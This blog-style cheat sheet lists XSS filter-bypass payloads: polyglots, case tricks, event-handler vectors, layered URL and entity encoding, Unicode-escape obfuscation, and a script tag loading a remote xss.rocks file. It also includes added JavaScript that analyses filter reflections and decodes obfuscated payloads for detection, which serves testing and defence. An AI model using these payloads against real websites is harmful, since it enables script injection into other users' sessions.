
XSS Filter Bypass Cheat Sheet

As I promised, here is the ultimate cheat sheet for bypassing XSS filters.
If you don't understand what I am saying, then you should read these articles first:

1. Cross Site Scripting (XSS) : Getting Started
2. Bypassing XSS Filters : Part 1
3. Bypassing XSS Filters : Part 2

Quick XSS Payloads

You can use these payloads when you want to quickly check for XSS in a webpage.

Filter Check
Submit this string and look at how it comes back: it shows which of the characters
are stripped or encoded, and whether a literal <script> tag is blocked.

/"'`\<><script>:;
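
Reading the reflection by eye gets error-prone once the input is echoed in several places, so here is an added example (my code, not part of the original post) that locates the probe in a response body and classifies each special character as raw, HTML-encoded or stripped. The markers zq7x/x7qz, the entity table and the three sample responses are all assumptions constructed for the example.

```javascript
// Added example (not from the original post): find where the filter-check
// probe is reflected and report, per special character, whether it came back
// raw, HTML-encoded or stripped, plus whether the literal <script> survived.

const PROBE = "/\"'`\\<><script>:;"; // the probe string from the post
const SPECIALS = ["/", "\"", "'", "`", "\\", "<", ">", ":", ";"];
// Assumed markers placed around the probe so its reflection can be located
// in the body even if the page echoes the input more than once.
const MARK_L = "zq7x";
const MARK_R = "x7qz";

// Usual HTML encodings of each special character (assumption: a filter using
// some other representation would be reported as "stripped").
const ENCODED_FORMS = {
  "/": ["&#47;", "&#x2f;", "&sol;"],
  "\"": ["&quot;", "&#34;", "&#x22;"],
  "'": ["&#39;", "&#x27;", "&apos;"],
  "`": ["&#96;", "&#x60;", "&grave;"],
  "\\": ["&#92;", "&#x5c;", "&bsol;"],
  "<": ["&lt;", "&#60;", "&#x3c;"],
  ">": ["&gt;", "&#62;", "&#x3e;"],
  ":": ["&#58;", "&#x3a;", "&colon;"],
  ";": ["&#59;", "&#x3b;", "&semi;"],
};

// The string to submit in the parameter under test.
function buildProbe() {
  return MARK_L + PROBE + MARK_R;
}

// Every reflection of the marked probe in the response body.
function extractReflections(body) {
  const found = [];
  let from = 0;
  for (;;) {
    const start = body.indexOf(MARK_L, from);
    if (start < 0) break;
    const end = body.indexOf(MARK_R, start + MARK_L.length);
    if (end < 0) break;
    found.push(body.slice(start + MARK_L.length, end));
    from = end + MARK_R.length;
  }
  return found;
}

// Classify one reflection. Entities are blanked out before the raw check so
// the ";" that terminates "&quot;" is not mistaken for a surviving ";".
function classifyReflection(reflected) {
  const lower = reflected.toLowerCase();
  const withoutEntities = reflected.replace(/&(#x?[0-9a-f]+|[a-z]+);/gi, "\u0000");
  const chars = {};
  for (const ch of SPECIALS) {
    if (withoutEntities.includes(ch)) chars[ch] = "raw";
    else if (ENCODED_FORMS[ch].some((e) => lower.includes(e))) chars[ch] = "encoded";
    else chars[ch] = "stripped";
  }
  return { chars, scriptTag: /<script>/i.test(withoutEntities) };
}

function analyze(body) {
  return extractReflections(body).map(classifyReflection);
}

// Constructed sample responses (not captured from any real site).
const SAMPLE_ENCODED =
  "<p>Results for zq7x&#x2F;&quot;&#x27;&#x60;\\&lt;&gt;&lt;script&gt;:;x7qz</p>";
const SAMPLE_BLACKLIST = "<input value=\"zq7x/\"'`\\<>:;x7qz\">"; // only <script> removed
const SAMPLE_UNFILTERED = "<div>" + buildProbe() + "</div>";

for (const body of [SAMPLE_ENCODED, SAMPLE_BLACKLIST, SAMPLE_UNFILTERED]) {
  console.log(JSON.stringify(analyze(body)));
}
```

A reflection where everything comes back "raw" inside an attribute (the SAMPLE_BLACKLIST case) is the interesting one: the blacklist removed the word script but left the quote that closes the attribute, which is exactly what the "><img src=x onerror=...> payloads further down rely on.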

XSS Tester: Alert XSS Statement
This payload tries to close open tags and get past basic case-sensitive filters (note the mixed-case SCrIPT) to pop an alert box.

';</script>">'><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>

XSS Polyglot 1
This is my custom payload; it tries to bypass basic filters by closing open tags and then combining several kinds of vector (a marquee, a plaintext tag with a mouseover handler, an image, and an INPUT TYPE=IMAGE with a javascript: SRC).

';'>"><marquee>test</marquee><plaintext/onmouseover=prompt(test)>
<img src="https://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

XSS Polyglot 2

//'/<@/></script></div></script>--><select */onclick=alert()><o>1<o>2')//"<!--

XSS Polyglot 3

<svg onload="void 'javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'; "></svg>

List Of Payloads

No quotes around the attribute and no trailing semicolon
Use when the filter expects a quoted SRC value or a semicolon after the call; the quotes inside alert() are untouched. Note that a javascript: URL in an image SRC only runs in old browsers, so this and the other javascript:-in-attribute vectors below (IMG SRC, TABLE BACKGROUND) are legacy payloads; javascript: in an <a> href or an iframe src still works.

<IMG SRC=javascript:alert('XSS')>

Without any quotes

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

Defeats tag matching (extra open brackets confuse engines that look for balanced pairs of angle brackets)

<<SCRIPT>alert("test");//<</SCRIPT>

No closing script tag

<SCRIPT SRC=https://xss.rocks/xss.js?< B >

Using body tag

<BODY ONLOAD=alert('XSS')>

Using video tag

<video src=_ onloadstart="alert(1)">

Using table tag

<TABLE BACKGROUND="javascript:alert('XSS')">

Closing an open script tag
Use when your input lands inside an existing <script> block: the first </script> ends that block, and the new script that follows runs on its own.

</script><script>alert(1)</script>

Triple URL Encoding (the encoded run decodes to "on" only after three passes, so a filter that decodes once never sees onmouseover)

<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>

JSFuck payload
[boom] is a placeholder for your JavaScript encoded with JSFuck, which uses only the six characters []()!+ and so gets past filters that look for letters or quotes inside the handler.
<img/src="x"/onerror="[boom]">

Using the onwheel event with the body tag
The tall body makes the page scrollable so the wheel event fires; [DATA] is a placeholder for your JavaScript.
<body style="height:1000px" onwheel="[DATA]">

Using &NewLine; and &Tab; inside the scheme of an <a> href
The HTML parser decodes the entities to newline and tab characters, and the URL parser then strips them, so the href is still treated as javascript:. The bracketed text stands for a long run of &NewLine;&Tab; pairs.
<a href="j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);">XSS</a>

Using ondrag with Unicode escapes
\u006e and \u006d are JavaScript identifier escapes: the engine resolves co\u006efir\u006d to confirm, while a filter matching the literal word confirm never sees it. The leading --> closes an HTML comment if the input lands inside one.
--><d/ /ondrag=co\u006efir\u006d(2)>hello.

Spaces and a control character (&#14;) before the javascript: scheme in an image SRC

<IMG SRC=" &#14;  javascript:alert('XSS');">

Here are some other payloads:

"><img src=x onerror=prompt(1)>
"><svg/onload=prompt(1)>
"><iframe/src=javascript:prompt(1)>
"><h1 onclick=prompt(1)>Clickme</h1>
"><a href=javascript:prompt(1)>Clickme</a>
"><a href="javascript:confirm%28 1%29">Clickme</a>
"><a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+">click</a>
"><textarea autofocus onfocus=prompt(1)>
"><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
"><script>co\u006efir\u006d`1`</script>
"><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
"><img src=x onerror=co\u006efir\u006d`1`>
"><svg/onload=co\u006efir\u006d`1`>
"><iframe/src=javascript:co\u006efir\u006d%28 1%29>
"><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
"><a href=javascript:prompt%28 1%29>Clickme</a>
"><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
"><textarea autofocus onfocus=co\u006efir\u006d(1)>
"><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
"><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoverme
"><img/src=x%0Aonerror=prompt`1`>
"><iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;">
"><h1/ondrag=co\u006efir\u006d`1`>DragMe</h1>
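
Most of the payloads above (triple URL encoding, &colon;/&lpar; entities, &NewLine;&Tab; inside the scheme, co\u006efir\u006d) work for the same reason: the filter compares the raw string while the browser decodes one or more layers first. The following is an added example, my own code rather than anything from the original post, showing a detector that peels those layers in the order the browser applies them before matching. The entity table, the pattern list and the sample payloads are constructed for the example; the &NewLine;&Tab; sample is a shortened stand-in for the 785-byte run in the post.

```javascript
// Added example (not from the original post): decode the obfuscation layers
// used by the payloads above so a detector matches the decoded form.

// Assumption: only the named entities that appear on this page are covered;
// a real implementation needs the full HTML5 entity table.
const NAMED_ENTITIES = {
  lt: "<", gt: ">", quot: "\"", amp: "&", colon: ":", lpar: "(", rpar: ")",
  equals: "=", NewLine: "\n", Tab: "\t",
};

// One pass of HTML entity decoding (&#40; &#x27; &colon; ...). Unknown names stay as-is.
function decodeHtmlEntities(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([A-Za-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined) return String.fromCodePoint(parseInt(hex, 16));
    if (dec !== undefined) return String.fromCodePoint(parseInt(dec, 10));
    return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, name) ? NAMED_ENTITIES[name] : m;
  });
}

// Percent-decode repeatedly until the string stops changing. A filter that
// decodes once while the application decodes three times never sees
// "onmouseover" in the triple-encoded payload.
function fullyUrlDecode(s, maxRounds = 5) {
  let current = s;
  let rounds = 0;
  while (rounds < maxRounds) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      break; // stray "%" or bad UTF-8: keep what we have
    }
    if (next === current) break;
    current = next;
    rounds++;
  }
  return { value: current, rounds };
}

// Resolve JavaScript \uXXXX escapes so "co\u006efir\u006d" reads "confirm".
function decodeJsUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Decode in the order the browser sees the layers: HTML entities (HTML
// parser), then percent-encoding (URL parser), then escapes (JS engine).
function normalize(payload) {
  return decodeJsUnicodeEscapes(fullyUrlDecode(decodeHtmlEntities(payload)).value);
}

const PATTERNS = [
  ["event handler", /\bon[a-z]+\s*=/i],
  ["javascript: URL", /javascript:/i],
  ["script tag", /<script\b/i],
  ["dialog call", /\b(?:alert|confirm|prompt)\s*[(`]/i],
];

function classify(payload) {
  const normalized = normalize(payload);
  // URL parsing drops tab/newline and leading control characters, so
  // "j\n\tavascript:" is still the javascript: scheme; check a compacted copy too.
  const compact = normalized.replace(/[\x00-\x20]/g, "");
  const findings = PATTERNS
    .filter(([, re]) => re.test(normalized) || re.test(compact))
    .map(([label]) => label);
  return { normalized, findings };
}

// What a filter that percent-decodes only once would conclude.
function singleDecodeFindsHandler(payload) {
  return /\bon[a-z]+\s*=/i.test(decodeURIComponent(payload));
}

// Constructed samples (payloads from the list above plus one benign string).
const SAMPLES = {
  tripleEncoded: "<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>",
  entitiesAndEscapes: "\"><a/href=javascript&colon;co\\u006efir\\u006d&#40;&quot;1&quot;&#41;>clickme</a>",
  whitespaceInScheme: "<a href=\"j&NewLine;&Tab;&NewLine;&Tab;avascript:alert(1);\">XSS</a>",
  srcdoc: "\"><iframe srcdoc=\"&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;\">",
  benign: "Tom &amp; Jerry, 100% natural",
};

for (const [name, payload] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(classify(payload)));
}
```

The benign sample matters as much as the hostile ones: "100% natural" makes decodeURIComponent throw, and a decoder that turned that into a rejection would block legitimate input, so the loop simply stops at the last successful round.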

The list ends here but I will add more payloads later.
Thanks for reading.